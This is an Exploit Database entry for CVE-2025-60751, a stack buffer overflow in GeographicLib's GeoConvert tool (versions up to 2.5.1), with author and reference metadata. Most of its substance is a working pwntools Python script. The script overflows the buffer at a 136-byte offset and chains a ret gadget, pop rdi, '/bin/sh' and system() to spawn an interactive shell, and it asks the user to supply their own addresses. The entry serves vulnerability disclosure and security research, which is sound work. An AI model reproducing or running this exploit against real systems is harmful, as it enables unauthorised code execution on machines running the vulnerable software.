[webapps] GeographicLib v2.5.1 - stack buffer overflow

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING GeographicLib v2.5.1 - stack buffer overflow EDB-ID: 52522 CVE: 2025-60751 EDB Verified: Author: ROSARIO Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2026-04-29 Vulnerable App: Exploit title: GeographicLib v2.5.1 - stack buffer overflow Date of discovery: 20 August 2025 Exploit Author: Me zer0matt (Rosario Matteo Grammatico) <https://github.com/zer0matt> Vendor homepage: https://github.com/geographiclib/ Software link: https://github.com/geographiclib/geographiclib Affected version: GeographicLib <= v2.5.1 Tested on: Kali Linux 6.12.25-amd64 (Virtual Machine) CVE id: CVE-2025-60751 Github issue: https://github.com/geographiclib/geographiclib/issues/43 Exploit repository: https://github.com/zer0matt/CVE-2025-60751 Blog post: https://zer0matt.github.io/CVE-2025-60751/ from pwn import * # --- INITIAL CONFIG --- binary_path = "./GeoConvert" elf = ELF(binary_path) context.binary = elf context.arch = 'amd64' # --- REPLACE THE ADDRESSES WITH YOUR OWN ONES --- pop_rdi = 0x000055555558BEFD ret_gadget = 0x000055555558A016 system_addr = 0x7ffff7a5d110 binsh_addr = 0x7ffff7bb1ea4 exit_addr = 0x7ffff7a4c340 # --- PAYLOAD --- offset = 136 payload = b"A" * offset payload += p64(ret_gadget) # stack align payload += p64(pop_rdi) # pop rdi; ret payload += p64(binsh_addr) # "/bin/sh" address payload += p64(system_addr) # system("/bin/sh") payload += p64(exit_addr) # exit io = process(binary_path, env={"ASAN_OPTIONS":"detect_stack_use_after_return=1"}) io.sendline(payload) io.interactive() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services